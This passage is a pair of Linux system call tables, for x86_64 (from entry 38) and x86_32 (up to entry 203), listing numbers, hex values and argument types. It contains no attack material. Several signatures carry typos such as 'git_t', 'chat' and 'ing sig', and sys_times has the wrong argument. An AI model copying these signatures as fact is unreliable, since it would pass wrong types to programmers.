38	sys_setitimer	26	int which	struct itimerval *value	struct itimerval *ovalue
39	sys_getpid	27
40	sys_sendfile	28	int out_fd	int in_fd	off_t *offset	size_t count
41	sys_socket	29	int family	int type	int protocol
42	sys_connect	2A	int fd	struct sockaddr *uservaddr	int addrlen
43	sys_accept	2B	int fd	struct sockaddr *upeer_sockaddr	int *upeer_addrlen
44	sys_sendto	2C	int fd	void *buff	size_t len	unsigned flags	struct sockaddr *addr	int addr_len
45	sys_recvfrom	2D	int fd	void *ubuf	size_t size	unsigned flags	struct sockaddr *addr	int *addr_len
46	sys_sendmsg	2E	int fd	struct msghdr *msg	unsigned flags
47	sys_recvmsg	2F	int fd	struct msghdr *msg	unsigned int flags
48	sys_shutdown	30	int fd	int how
49	sys_bind	31	int fd	struct sokaddr *umyaddr	int addrlen
50	sys_listen	32	int fd	int backlog
51	sys_getsockname	33	int fd	struct sockaddr *usockaddr	int *usockaddr_len
52	sys_getpeername	34	int fd	struct sockaddr *usockaddr	int *usockaddr_len
53	sys_socketpair	35	int family	int type	int protocol	int *usockvec
54	sys_setsockopt	36	int fd	int level	int optname	char *optval	int optlen
55	sys_getsockopt	37	int fd	int level	int optname	char *optval	int *optlen
56	sys_clone	38	unsigned long clone_flags	unsigned long newsp	void *parent_tid	void *child_tid
57	sys_fork	39
58	sys_vfork	3A
59	sys_execve	3B	const char *filename	const char *const argv[]	const char *const envp[]
60	sys_exit	3C	int error_code
61	sys_wait4	3D	pid_t upid	int *stat_addr	int options	struct rusage *ru
62	sys_kill	3E	pid_t pid	int sig
63	sys_uname	3F	struct old_utsname *name
64	sys_semget	40	key_t key	int nsems	int semflg
65	sys_semop	41	int semid	struct sembuf *tsops	unsigned nsops
66	sys_semctl	42	int semid	int semnum	int cmd	union semun arg
67	sys_shmdt	43	char *shmaddr
68	sys_msgget	44	key_t key	int msgflg
69	sys_msgsnd	45	int msqid	struct msgbuf *msgp	size_t msgsz	int msgflg
70	sys_msgrcv	46	int msqid	struct msgbuf *msgp	size_t msgsz	long msgtyp	int msgflg
71	sys_msgctl	47	int msqid	int cmd	struct msqid_ds *buf
72	sys_fcntl	48	unsigned int fd	unsigned int cmd	unsigned long arg
73	sys_flock	49	unsigned int fd	unsigned int cmd
74	sys_fsync	4A	unsigned int fd
75	sys_fdatasync	4B	unsigned int fd
76	sys_truncate	4C	const char *path	long length
77	sys_ftruncate	4D	unsigned int fd	unsigned long length
78	sys_getdents	4E	unsigned int fd	struct linux_dirent *dirent	unsigned int count
79	sys_getcwd	4F	char *buf	unsigned long size
80	sys_chdir	50	const char *filename
81	sys_fchdir	51	unsigned int fd
82	sys_rename	52	const char *oldname	const char *newname
83	sys_mkdir	53	const char *pathname	int mode
84	sys_rmdir	54	const char *pathname
85	sys_creat	55	const char *pathname	int mode
86	sys_link	56	const char *oldname	const char *newname
87	sys_unlink	57	const char *pathname
88	sys_symlink	58	const char *oldname	const char *newname
89	sys_readlink	59	const char *path	char *buf	int bufsiz
90	sys_chmod	5A	const char *filename	mode_t mode
91	sys_fchmod	5B	unsigned int fd	mode_t mode
92	sys_chown	5C	const char *filename	uid_t user	git_t group
93	sys_fchown	5D	unsigned int fd	uid_t user	git_t group
94	sys_lchown	5E	const char *filename	uid_t user	git_t group
95	sys_umask	5F	int mask
96	sys_gettimeofday	60	struct timeval *tv	struct timezone *tz
97	sys_getrlimit	61	unsigned int resource	struct rlimit *rlim
98	sys_getrusage	62	int who	struct rusage *ru
99	sys_sysinfo	63	struct sysinfo *info
100	sys_times	64	struct sysinfo *info
101	sys_ptrace	65	long request	long pid	unsigned long addr	unsigned long data
102	sys_getuid	66
103	sys_syslog	67	int type	char *buf	int len
104	sys_getgid	68
105	sys_setuid	69	uid_t uid
106	sys_setgid	6A	git_t gid
107	sys_geteuid	6B
108	sys_getegid	6C
109	sys_setpgid	6D	pid_t pid	pid_t pgid
110	sys_getppid	6E
111	sys_getpgrp	6F
112	sys_setsid	70
113	sys_setreuid	71	uid_t ruid	uid_t euid
114	sys_setregid	72	git_t rgid	gid_t egid
115	sys_getgroups	73	int gidsetsize	gid_t *grouplist
116	sys_setgroups	74	int gidsetsize	gid_t *grouplist
117	sys_setresuid	75	uid_t *ruid	uid_t *euid	uid_t *suid
118	sys_getresuid	76	uid_t *ruid	uid_t *euid	uid_t *suid
119	sys_setresgid	77	gid_t rgid	gid_t egid	gid_t sgid
120	sys_getresgid	78	git_t *rgid	git_t *egid	git_t *sgid
121	sys_getpgid	79	pid_t pid
122	sys_setfsuid	7A	uid_t uid
123	sys_setfsgid	7B	gid_t gid
124	sys_getsid	7C	pid_t pid
125	sys_capget	7D	cap_user_header_t header	cap_user_data_t dataptr
126	sys_capset	7E	cap_user_header_t header	const cap_user_data_t data
127	sys_rt_sigpending	7F	sigset_t *set	size_t sigsetsize
128	sys_rt_sigtimedwait	80	const sigset_t *uthese	siginfo_t *uinfo	const struct timespec *uts	size_t sigsetsize
129	sys_rt_sigqueueinfo	81	pid_t pid	int sig	siginfo_t *uinfo
130	sys_rt_sigsuspend	82	sigset_t *unewset	size_t sigsetsize
131	sys_sigaltstack	83	const stack_t *uss	stack_t *uoss
132	sys_utime	84	char *filename	struct utimbuf *times
133	sys_mknod	85	const char *filename	int mode	unsigned dev
134	sys_uselib	86	NOT IMPLEMENTED
135	sys_personality	87	unsigned int personality
136	sys_ustat	88	unsigned dev	struct ustat *ubuf
137	sys_statfs	89	const char *pathname	struct statfs *buf
138	sys_fstatfs	8A	unsigned int fd	struct statfs *buf
139	sys_sysfs	8B	int option	unsigned long arg1	unsigned long arg2
140	sys_getpriority	8C	int which	int who
141	sys_setpriority	8D	int which	int who	int niceval
142	sys_sched_setparam	8E	pid_t pid	struct sched_param *param
143	sys_sched_getparam	8F	pid_t pid	struct sched_param *param
144	sys_sched_setscheduler	90	pid_t pid	int policy	struct sched_param *param
145	sys_sched_getscheduler	91	pid_t pid
146	sys_sched_get_priority_max	92	int policy
147	sys_sched_get_priority_min	93	int policy
148	sys_sched_rr_get_interval	94	pid_t pid	struct timespec *interval
149	sys_mlock	95	unsigned long start	size_t len
150	sys_munlock	96	unsigned long start	size_t len
151	sys_mlockall	97	int flags
152	sys_munlockall	98
153	sys_vhangup	99
154	sys_modify_ldt	9A	int func	void *ptr	unsigned long bytecount
155	sys_pivot_root	9B	const char *new_root	const char *put_old
156	sys__sysctl	9C	struct __sysctl_args *args
157	sys_prctl	9D	int option	unsigned long arg2	unsigned long arg3	unsigned long arg4	unsigned long arg5
158	sys_arch_prctl	9E	struct task_struct *task	int code	unsigned long *addr
159	sys_adjtimex	9F	struct timex *txc_p
160	sys_setrlimit	A0	unsigned int resource	struct rlimit *rlim
161	sys_chroot	A1	const char *filename
162	sys_sync	A2
163	sys_acct	A3	const char *name
164	sys_settimeofday	A4	struct timeval *tv	struct timezone *tz
165	sys_mount	A5	char *dev_name	char *dir_name	char *type	unsigned long flags	void *data
166	sys_umount2	A6	const char *target	int flags
167	sys_swapon	A7	const char *specialfile	int swap_flags
168	sys_swapoff	A8	const char *specialfile
169	sys_reboot	A9	int magic1	int magic2	unsigned int cmd	void *arg
170	sys_sethostname	AA	char *name	int len
171	sys_setdomainname	AB	char *name	int len
172	sys_iopl	AC	unsigned int level	struct pt_regs *regs
173	sys_ioperm	AD	unsigned long from	unsigned long num	int turn_on
174	sys_create_module	AE	REMOVED IN Linux 2.6
175	sys_init_module	AF	void *umod	unsigned long len	const char *uargs
176	sys_delete_module	B0	const chat *name_user	unsigned int flags
177	sys_get_kernel_syms	B1	REMOVED IN Linux 2.6
178	sys_query_module	B2	REMOVED IN Linux 2.6
179	sys_quotactl	B3	unsigned int cmd	const char *special	qid_t id	void *addr
180	sys_nfsservctl	B4	NOT IMPLEMENTED
181	sys_getpmsg	B5	NOT IMPLEMENTED
182	sys_putpmsg	B6	NOT IMPLEMENTED
183	sys_afs_syscall	B7	NOT IMPLEMENTED
184	sys_tuxcall	B8	NOT IMPLEMENTED
185	sys_security	B9	NOT IMPLEMENTED
186	sys_gettid	BA
187	sys_readahead	BB	int fd	loff_t offset	size_t count
188	sys_setxattr	BC	const char *pathname	const char *name	const void *value	size_t size	int flags
189	sys_lsetxattr	BD	const char *pathname	const char *name	const void *value	size_t size	int flags
190	sys_fsetxattr	BE	int fd	const char *name	const void *value	size_t size	int flags
191	sys_getxattr	BF	const char *pathname	const char *name	void *value	size_t size
192	sys_lgetxattr	C0	const char *pathname	const char *name	void *value	size_t size
193	sys_fgetxattr	C1	int fd	const har *name	void *value	size_t size
194	sys_listxattr	C2	const char *pathname	char *list	size_t size
195	sys_llistxattr	C3	const char *pathname	char *list	size_t size
196	sys_flistxattr	C4	int fd	char *list	size_t size
197	sys_removexattr	C5	const char *pathname	const char *name
198	sys_lremovexattr	C6	const char *pathname	const char *name
199	sys_fremovexattr	C7	int fd	const char *name
200	sys_tkill	C8	pid_t pid	ing sig
201	sys_time	C9	time_t *tloc
202	sys_futex	CA	u32 *uaddr	int op	u32 val	struct timespec *utime	u32 *uaddr2	u32 val3
203	sys_sched_setaffinity	CB	pid_t pid	unsigned int len	unsigned long *user_mask_ptr
204	sys_sched_getaffinity	CC	pid_t pid	unsigned int len	unsigned long *user_mask_ptr
205	sys_set_thread_area	CD	NOT IMPLEMENTED. Use arch_prctl
206	sys_io_setup	CE	unsigned nr_events	aio_context_t *ctxp
207	sys_io_destroy	CF	aio_context_t ctx
208	sys_io_getevents	D0	aio_context_t ctx_id	long min_nr	long nr	struct io_event *events
209	sys_io_submit	D1	aio_context_t ctx_id	long nr	struct iocb **iocbpp
210	sys_io_cancel	D2	aio_context_t ctx_id	struct iocb *iocb	struct io_event *result
211	sys_get_thread_area	D3	NOT IMPLEMENTED. Use arch_prctl
212	sys_lookup_dcookie	D4	u64 cookie64	long buf	long len
213	sys_epoll_create	D5	int size
214	sys_epoll_ctl_old	D6	NOT IMPLEMENTED
215	sys_epoll_wait_old	D7	NOT IMPLEMENTED
216	sys_remap_file_pages	D8	unsigned long start	unsigned long size	unsigned long prot	unsigned long pgoff	unsigned long flags
217	sys_getdents64	D9	unsigned int fd	struct linux_dirent64 *dirent	unsigned int count
218	sys_set_tid_address	DA	int *tidptr
219	sys_restart_syscall	DB
220	sys_semtimedop	DC	int semid	struct sembuf *tsops	unsigned nsops	const struct timespec *timeout
221	sys_fadvise64	DD	int fd	loff_t offset	size_t len	int advice
222	sys_timer_create	DE	const clockid_t which_clock	struct sigevent *timer_event_spec	timer_t *created_timer_id
223	sys_timer_settime	DF	timer_t timer_id	int flags	const struct itimerspec *new_setting	struct itimerspec *old_setting
224	sys_timer_gettime	E0	timer_t timer_id	struct itimerspec *setting
225	sys_timer_getoverrun	E1	timer_t timer_id
226	sys_timer_delete	E2	timer_t timer_id
227	sys_clock_settime	E3	const clockid_t which_clock	const struct timespec *tp
228	sys_clock_gettime	E4	const clockid_t which_clock	struct timespec *tp
229	sys_clock_getres	E5	const clockid_t which_clock	struct timespec *tp
230	sys_clock_nanosleep	E6	const clockid_t which_clock	int flags	const struct timespec *rqtp	struct timespec *rmtp
231	sys_exit_group	E7	int error_code
232	sys_epoll_wait	E8	int epfd	struct epoll_event *events	int maxevents	int timeout
233	sys_epoll_ctl	E9	int epfd	int op	int fd	struct epoll_event *event
234	sys_tgkill	EA	pid_t tgid	pid_t pid	int sig
235	sys_utimes	EB	char *filename	struct timeval *utimes
236	sys_vserver	EC	NOT IMPLEMENTED
237	sys_mbind	ED	unsigned long start	unsigned long len	unsigned long mode	unsigned long *nmask	unsigned long maxnode	unsigned flags
238	sys_set_mempolicy	EE	int mode	unsigned long *nmask	unsigned long maxnode
239	sys_get_mempolicy	EF	int *policy	unsigned long *nmask	unsigned long maxnode	unsigned long addr	unsigned long flags
240	sys_mq_open	F0	const char *u_name	int oflag	mode_t mode	struct mq_attr *u_attr
241	sys_mq_unlink	F1	const char *u_name
242	sys_mq_timedsend	F2	mqd_t mqdes	const char *u_msg_ptr	size_t msg_len	unsigned int msg_prio	const stuct timespec *u_abs_timeout
243	sys_mq_timedreceive	F3	mqd_t mqdes	char *u_msg_ptr	size_t msg_len	unsigned int *u_msg_prio	const struct timespec *u_abs_timeout
244	sys_mq_notify	F4	mqd_t mqdes	const struct sigevent *u_notification
245	sys_mq_getsetattr	F5	mqd_t mqdes	const struct mq_attr *u_mqstat	struct mq_attr *u_omqstat
246	sys_kexec_load	F6	unsigned long entry	unsigned long nr_segments	struct kexec_segment *segments	unsigned long flags
247	sys_waitid	F7	int which	pid_t upid	struct siginfo *infop	int options	struct rusage *ru
248	sys_add_key	F8	const char *_type	const char *_description	const void *_payload	size_t plen
249	sys_request_key	F9	const char *_type	const char *_description	const char *_callout_info	key_serial_t destringid
250	sys_keyctl	FA	int option	unsigned long arg2	unsigned long arg3	unsigned long arg4	unsigned long arg5
251	sys_ioprio_set	FB	int which	int who	int ioprio
252	sys_ioprio_get	FC	int which	int who
253	sys_inotify_init	FD
254	sys_inotify_add_watch	FE	int fd	const char *pathname	u32 mask
255	sys_inotify_rm_watch	FF	int fd	__s32 wd
256	sys_migrate_pages	100	pid_t pid	unsigned long maxnode	const unsigned long *old_nodes	const unsigned long *new_nodes
257	sys_openat	101	int dfd	const char *filename	int flags	int mode
258	sys_mkdirat	102	int dfd	const char *pathname	int mode
259	sys_mknodat	103	int dfd	const char *filename	int mode	unsigned dev
260	sys_fchownat	104	int dfd	const char *filename	uid_t user	gid_t group	int flag
261	sys_futimesat	105	int dfd	const char *filename	struct timeval *utimes
262	sys_newfstatat	106	int dfd	const char *filename	struct stat *statbuf	int flag
263	sys_unlinkat	107	int dfd	const char *pathname	int flag
264	sys_renameat	108	int oldfd	const char *oldname	int newfd	const char *newname
265	sys_linkat	109	int oldfd	const char *oldname	int newfd	const char *newname	int flags
266	sys_symlinkat	10A	const char *oldname	int newfd	const char *newname
267	sys_readlinkat	10B	int dfd	const char *pathname	char *buf	int bufsiz
268	sys_fchmodat	10C	int dfd	const char *filename	mode_t mode
269	sys_faccessat	10D	int dfd	const char *filename	int mode
270	sys_pselect6	10E	int n	fd_set *inp	fd_set *outp	fd_set *exp	struct timespec *tsp	void *sig
271	sys_ppoll	10F	struct pollfd *ufds	unsigned int nfds	struct timespec *tsp	const sigset_t *sigmask	size_t sigsetsize
272	sys_unshare	110	unsigned long unshare_flags
273	sys_set_robust_list	111	struct robust_list_head *head	size_t len
274	sys_get_robust_list	112	int pid	struct robust_list_head **head_ptr	size_t *len_ptr
275	sys_splice	113	int fd_in	loff_t *off_in	int fd_out	loff_t *off_out	size_t len	unsigned int flags
276	sys_tee	114	int fdin	int fdout	size_t len	unsigned int flags
277	sys_sync_file_range	115	long fd	loff_t offset	loff_t bytes	long flags
278	sys_vmsplice	116	int fd	const struct iovec *iov	unsigned long nr_segs	unsigned int flags
279	sys_move_pages	117	pid_t pid	unsigned long nr_pages	const void **pages	const int *nodes	int *status	int flags
280	sys_utimensat	118	int dfd	const char *filename	struct timespec *utimes	int flags
281	sys_epoll_pwait	119	int epfd	struct epoll_event *events	int maxevents	int timeout	const sigset_t *sigmask	size_t sigsetsize
282	sys_signalfd	11A	int ufd	sigset_t *user_mask	size_t sizemask
283	sys_timerfd_create	11B	int clockid	int flags
284	sys_eventfd	11C	unsigned int count
285	sys_fallocate	11D	long fd	long mode	loff_t offset	loff_t len
286	sys_timerfd_settime	11E	int ufd	int flags	const struct itimerspec *utmr	struct itimerspec *otmr
287	sys_timerfd_gettime	11F	int ufd	struct itimerspec *otmr
288	sys_accept4	120	int fd	struct sockaddr *upeer_sockaddr	int *upeer_addrlen	int flags
289	sys_signalfd4	121	int ufd	sigset_t *user_mask	size_t sizemask	int flags
290	sys_eventfd2	122	unsigned int count	int flags
291	sys_epoll_create1	123	int flags
292	sys_dup3	124	unsigned int oldfd	unsigned int newfd	int flags
293	sys_pipe2	125	int *filedes	int flags
294	sys_inotify_init1	126	int flags
295	sys_preadv	127	unsigned long fd	const struct iovec *vec	unsigned long vlen	unsigned long pos_l	unsigned long pos_h
296	sys_pwritev	128	unsigned long fd	const struct iovec *vec	unsigned long vlen	unsigned long pos_l	unsigned long pos_h
297	sys_rt_tgsigqueueinfo	129	pid_t tgid	pid_t pid	int sig	siginfo_t *uinfo
298	sys_perf_event_open	12A	struct perf_event_attr *attr_uptr	pid_t pid	int cpu	int group_fd	unsigned long flags
299	sys_recvmmsg	12B	int fd	struct msghdr *mmsg	unsigned int vlen	unsigned int flags	struct timespec *timeout
300	sys_fanotify_init	12C	unsigned int flags	unsigned int event_f_flags
301	sys_fanotify_mark	12D	long fanotify_fd	long flags	__u64 mask	long dfd	long pathname
302	sys_prlimit64	12E	pid_t pid	unsigned int resource	const struct rlimit64 *new_rlim	struct rlimit64 *old_rlim
303	sys_name_to_handle_at	12F	int dfd	const char *name	struct file_handle *handle	int *mnt_id	int flag
304	sys_open_by_handle_at	130	int dfd	const char *name	struct file_handle *handle	int *mnt_id	int flags
305	sys_clock_adjtime	131	clockid_t which_clock	struct timex *tx
306	sys_syncfs	132	int fd
307	sys_sendmmsg	133	int fd	struct mmsghdr *mmsg	unsigned int vlen	unsigned int flags
308	sys_setns	134	int fd	int nstype
309	sys_getcpu	135	unsigned *cpup	unsigned *nodep	struct getcpu_cache *unused
310	sys_process_vm_readv	136	pid_t pid	const struct iovec *lvec	unsigned long liovcnt	const struct iovec *rvec	unsigned long riovcnt	unsigned long flags
311	sys_process_vm_writev	137	pid_t pid	const struct iovec *lvec	unsigned long liovcnt	const struct iovcc *rvec	unsigned long riovcnt	unsigned long flags

System Call Table - x86_32

2022-04-13T11:50:39.000Z

NR	syscall	%eax	arg0 (%ebx)	arg1 (%ecx)	arg2 (%edx)	arg3 (%esi)	arg4 (%edi)	arg5 (%ebp)
0	restart_syscall	0	-	-	-	-	-	-
1	exit	1	int error_code	-	-	-	-	-
2	fork	2	-	-	-	-	-	-
3	read	3	unsigned int fd	char *buf	size_t count	-	-	-
4	write	4	unsigned int fd	const char *buf	size_t count	-	-	-
5	open	5	const char *filename	int flags	umode_t mode	-	-	-
6	close	6	unsigned int fd	-	-	-	-	-
7	waitpid	7	pid_t pid	int *stat_addr	int options	-	-	-
8	creat	8	const char *pathname	umode_t mode	-	-	-	-
9	link	9	const char *oldname	const char *newname	-	-	-	-
10	unlink	A	const char *pathname	-	-	-	-	-
11	execve	B	const char *filename	const char const argv	const char const envp	-	-	-
12	chdir	C	const char *filename	-	-	-	-	-
13	time	D	time_t *tloc	-	-	-	-	-
14	mknod	E	const char *filename	umode_t mode	unsigned dev	-	-	-
15	chmod	F	const char *filename	umode_t mode	-	-	-	-
16	lchown	10	const char *filename	uid_t user	gid_t group	-	-	-
17	break	11	?	?	?	?	?	?
18	oldstat	12	?	?	?	?	?	?
19	lseek	13	unsigned int fd	off_t offset	unsigned int whence	-	-	-
20	getpid	14	-	-	-	-	-	-
21	mount	15	char *dev_name	char *dir_name	char *type	unsigned long flags	void *data	-
22	umount	16	char *name	int flags	-	-	-	-
23	setuid	17	uid_t uid	-	-	-	-	-
24	getuid	18	-	-	-	-	-	-
25	stime	19	time_t *tptr	-	-	-	-	-
26	ptrace	1A	long request	long pid	unsigned long addr	unsigned long data	-	-
27	alarm	1B	unsigned int seconds	-	-	-	-	-
28	oldfstat	1C	?	?	?	?	?	?
29	pause	1D	-	-	-	-	-	-
30	utime	1E	char *filename	struct utimbuf *times	-	-	-	-
31	stty	1F	?	?	?	?	?	?
32	gtty	20	?	?	?	?	?	?
33	access	21	const char *filename	int mode	-	-	-	-
34	nice	22	int increment	-	-	-	-	-
35	ftime	23	?	?	?	?	?	?
36	sync	24	-	-	-	-	-	-
37	kill	25	pid_t pid	int sig	-	-	-	-
38	rename	26	const char *oldname	const char *newname	-	-	-	-
39	mkdir	27	const char *pathname	umode_t mode	-	-	-	-
40	rmdir	28	const char *pathname	-	-	-	-	-
41	dup	29	unsigned int fildes	-	-	-	-	-
42	pipe	2A	int *fildes	-	-	-	-	-
43	times	2B	struct tms *tbuf	-	-	-	-	-
44	prof	2C	?	?	?	?	?	?
45	brk	2D	unsigned long brk	-	-	-	-	-
46	setgid	2E	gid_t gid	-	-	-	-	-
47	getgid	2F	-	-	-	-	-	-
48	signal	30	int sig	__sighandler_t handler	-	-	-	-
49	geteuid	31	-	-	-	-	-	-
50	getegid	32	-	-	-	-	-	-
51	acct	33	const char *name	-	-	-	-	-
52	umount2	34	?	?	?	?	?	?
53	lock	35	?	?	?	?	?	?
54	ioctl	36	unsigned int fd	unsigned int cmd	unsigned long arg	-	-	-
55	fcntl	37	unsigned int fd	unsigned int cmd	unsigned long arg	-	-	-
56	mpx	38	?	?	?	?	?	?
57	setpgid	39	pid_t pid	pid_t pgid	-	-	-	-
58	ulimit	3A	?	?	?	?	?	?
59	oldolduname	3B	?	?	?	?	?	?
60	umask	3C	int mask	-	-	-	-	-
61	chroot	3D	const char *filename	-	-	-	-	-
62	ustat	3E	unsigned dev	struct ustat *ubuf	-	-	-	-
63	dup2	3F	unsigned int oldfd	unsigned int newfd	-	-	-	-
64	getppid	40	-	-	-	-	-	-
65	getpgrp	41	-	-	-	-	-	-
66	setsid	42	-	-	-	-	-	-
67	sigaction	43	int	const struct old_sigaction *	struct old_sigaction *	-	-	-
68	sgetmask	44	-	-	-	-	-	-
69	ssetmask	45	int newmask	-	-	-	-	-
70	setreuid	46	uid_t ruid	uid_t euid	-	-	-	-
71	setregid	47	gid_t rgid	gid_t egid	-	-	-	-
72	sigsuspend	48	int unused1	int unused2	old_sigset_t mask	-	-	-
73	sigpending	49	old_sigset_t *uset	-	-	-	-	-
74	sethostname	4A	char *name	int len	-	-	-	-
75	setrlimit	4B	unsigned int resource	struct rlimit *rlim	-	-	-	-
76	getrlimit	4C	unsigned int resource	struct rlimit *rlim	-	-	-	-
77	getrusage	4D	int who	struct rusage *ru	-	-	-	-
78	gettimeofday	4E	struct timeval *tv	struct timezone *tz	-	-	-	-
79	settimeofday	4F	struct timeval *tv	struct timezone *tz	-	-	-	-
80	getgroups	50	int gidsetsize	gid_t *grouplist	-	-	-	-
81	setgroups	51	int gidsetsize	gid_t *grouplist	-	-	-	-
82	select	52	int n	fd_set *inp	fd_set *outp	fd_set *exp	struct timeval *tvp	-
83	symlink	53	const char *old	const char *new	-	-	-	-
84	oldlstat	54	?	?	?	?	?	?
85	readlink	55	const char *path	char *buf	int bufsiz	-	-	-
86	uselib	56	const char *library	-	-	-	-	-
87	swapon	57	const char *specialfile	int swap_flags	-	-	-	-
88	reboot	58	int magic1	int magic2	unsigned int cmd	void *arg	-	-
89	readdir	59	?	?	?	?	?	?
90	mmap	5A	?	?	?	?	?	?
91	munmap	5B	unsigned long addr	size_t len	-	-	-	-
92	truncate	5C	const char *path	long length	-	-	-	-
93	ftruncate	5D	unsigned int fd	unsigned long length	-	-	-	-
94	fchmod	5E	unsigned int fd	umode_t mode	-	-	-	-
95	fchown	5F	unsigned int fd	uid_t user	gid_t group	-	-	-
96	getpriority	60	int which	int who	-	-	-	-
97	setpriority	61	int which	int who	int niceval	-	-	-
98	profil	62	?	?	?	?	?	?
99	statfs	63	const char * path	struct statfs *buf	-	-	-	-
100	fstatfs	64	unsigned int fd	struct statfs *buf	-	-	-	-
101	ioperm	65	unsigned long from	unsigned long num	int on	-	-	-
102	socketcall	66	int call	unsigned long *args	-	-	-	-
103	syslog	67	int type	char *buf	int len	-	-	-
104	setitimer	68	int which	struct itimerval *value	struct itimerval *ovalue	-	-	-
105	getitimer	69	int which	struct itimerval *value	-	-	-	-
106	stat	6A	const char *filename	struct __old_kernel_stat *statbuf	-	-	-	-
107	lstat	6B	const char *filename	struct __old_kernel_stat *statbuf	-	-	-	-
108	fstat	6C	unsigned int fd	struct __old_kernel_stat *statbuf	-	-	-	-
109	olduname	6D	struct oldold_utsname *	-	-	-	-	-
110	iopl	6E	?	?	?	?	?	?
111	vhangup	6F	-	-	-	-	-	-
112	idle	70	?	?	?	?	?	?
113	vm86old	71	?	?	?	?	?	?
114	wait4	72	pid_t pid	int *stat_addr	int options	struct rusage *ru	-	-
115	swapoff	73	const char *specialfile	-	-	-	-	-
116	sysinfo	74	struct sysinfo *info	-	-	-	-	-
117	ipc	75	unsigned int call	int first	unsigned long second	unsigned long third	void *ptr	long fifth
118	fsync	76	unsigned int fd	-	-	-	-	-
119	sigreturn	77	?	?	?	?	?	?
120	clone	78	unsigned long	unsigned long	int *	int *	unsigned long	-
121	setdomainname	79	char *name	int len	-	-	-	-
122	uname	7A	struct old_utsname *	-	-	-	-	-
123	modify_ldt	7B	?	?	?	?	?	?
124	adjtimex	7C	struct timex *txc_p	-	-	-	-	-
125	mprotect	7D	unsigned long start	size_t len	unsigned long prot	-	-	-
126	sigprocmask	7E	int how	old_sigset_t *set	old_sigset_t *oset	-	-	-
127	create_module	7F	?	?	?	?	?	?
128	init_module	80	void *umod	unsigned long len	const char *uargs	-	-	-
129	delete_module	81	const char *name_user	unsigned int flags	-	-	-	-
130	get_kernel_syms	82	?	?	?	?	?	?
131	quotactl	83	unsigned int cmd	const char *special	qid_t id	void *addr	-	-
132	getpgid	84	pid_t pid	-	-	-	-	-
133	fchdir	85	unsigned int fd	-	-	-	-	-
134	bdflush	86	int func	long data	-	-	-	-
135	sysfs	87	int option	unsigned long arg1	unsigned long arg2	-	-	-
136	personality	88	unsigned int personality	-	-	-	-	-
137	afs_syscall	89	?	?	?	?	?	?
138	setfsuid	8A	uid_t uid	-	-	-	-	-
139	setfsgid	8B	gid_t gid	-	-	-	-	-
140	_llseek	8C	?	?	?	?	?	?
141	getdents	8D	unsigned int fd	struct linux_dirent *dirent	unsigned int count	-	-	-
142	_newselect	8E	?	?	?	?	?	?
143	flock	8F	unsigned int fd	unsigned int cmd	-	-	-	-
144	msync	90	unsigned long start	size_t len	int flags	-	-	-
145	readv	91	unsigned long fd	const struct iovec *vec	unsigned long vlen	-	-	-
146	writev	92	unsigned long fd	const struct iovec *vec	unsigned long vlen	-	-	-
147	getsid	93	pid_t pid	-	-	-	-	-
148	fdatasync	94	unsigned int fd	-	-	-	-	-
149	_sysctl	95	?	?	?	?	?	?
150	mlock	96	unsigned long start	size_t len	-	-	-	-
151	munlock	97	unsigned long start	size_t len	-	-	-	-
152	mlockall	98	int flags	-	-	-	-	-
153	munlockall	99	-	-	-	-	-	-
154	sched_setparam	9A	pid_t pid	struct sched_param *param	-	-	-	-
155	sched_getparam	9B	pid_t pid	struct sched_param *param	-	-	-	-
156	sched_setscheduler	9C	pid_t pid	int policy	struct sched_param *param	-	-	-
157	sched_getscheduler	9D	pid_t pid	-	-	-	-	-
158	sched_yield	9E	-	-	-	-	-	-
159	sched_get_priority_max	9F	int policy	-	-	-	-	-
160	sched_get_priority_min	A0	int policy	-	-	-	-	-
161	sched_rr_get_interval	A1	pid_t pid	struct timespec *interval	-	-	-	-
162	nanosleep	A2	struct __kernel_timespec *rqtp	struct __kernel_timespec *rmtp	-	-	-	-
163	mremap	A3	unsigned long addr	unsigned long old_len	unsigned long new_len	unsigned long flags	unsigned long new_addr	-
164	setresuid	A4	uid_t ruid	uid_t euid	uid_t suid	-	-	-
165	getresuid	A5	uid_t *ruid	uid_t *euid	uid_t *suid	-	-	-
166	vm86	A6	?	?	?	?	?	?
167	query_module	A7	?	?	?	?	?	?
168	poll	A8	struct pollfd *ufds	unsigned int nfds	int timeout	-	-	-
169	nfsservctl	A9	?	?	?	?	?	?
170	setresgid	AA	gid_t rgid	gid_t egid	gid_t sgid	-	-	-
171	getresgid	AB	gid_t *rgid	gid_t *egid	gid_t *sgid	-	-	-
172	prctl	AC	int option	unsigned long arg2	unsigned long arg3	unsigned long arg4	unsigned long arg5	-
173	rt_sigreturn	AD	?	?	?	?	?	?
174	rt_sigaction	AE	int	const struct sigaction *	struct sigaction *	size_t	-	-
175	rt_sigprocmask	AF	int how	sigset_t *set	sigset_t *oset	size_t sigsetsize	-	-
176	rt_sigpending	B0	sigset_t *set	size_t sigsetsize	-	-	-	-
177	rt_sigtimedwait	B1	const sigset_t *uthese	siginfo_t *uinfo	const struct timespec *uts	size_t sigsetsize	-	-
178	rt_sigqueueinfo	B2	pid_t pid	int sig	siginfo_t *uinfo	-	-	-
179	rt_sigsuspend	B3	sigset_t *unewset	size_t sigsetsize	-	-	-	-
180	pread64	B4	unsigned int fd	char *buf	size_t count	loff_t pos	-	-
181	pwrite64	B5	unsigned int fd	const char *buf	size_t count	loff_t pos	-	-
182	chown	B6	const char *filename	uid_t user	gid_t group	-	-	-
183	getcwd	B7	char *buf	unsigned long size	-	-	-	-
184	capget	B8	cap_user_header_t header	cap_user_data_t dataptr	-	-	-	-
185	capset	B9	cap_user_header_t header	const cap_user_data_t data	-	-	-	-
186	sigaltstack	BA	const struct sigaltstack *uss	struct sigaltstack *uoss	-	-	-	-
187	sendfile	BB	int out_fd	int in_fd	off_t *offset	size_t count	-	-
188	getpmsg	BC	?	?	?	?	?	?
189	putpmsg	BD	?	?	?	?	?	?
190	vfork	BE	-	-	-	-	-	-
191	ugetrlimit	BF	?	?	?	?	?	?
192	mmap2	C0	?	?	?	?	?	?
193	truncate64	C1	const char *path	loff_t length	-	-	-	-
194	ftruncate64	C2	unsigned int fd	loff_t length	-	-	-	-
195	stat64	C3	const char *filename	struct stat64 *statbuf	-	-	-	-
196	lstat64	C4	const char *filename	struct stat64 *statbuf	-	-	-	-
197	fstat64	C5	unsigned long fd	struct stat64 *statbuf	-	-	-	-
198	lchown32	C6	?	?	?	?	?	?
199	getuid32	C7	?	?	?	?	?	?
200	getgid32	C8	?	?	?	?	?	?
201	geteuid32	C9	?	?	?	?	?	?
202	getegid32	CA	?	?	?	?	?	?
203	setreuid32	CB	?	?	?	?	?	?
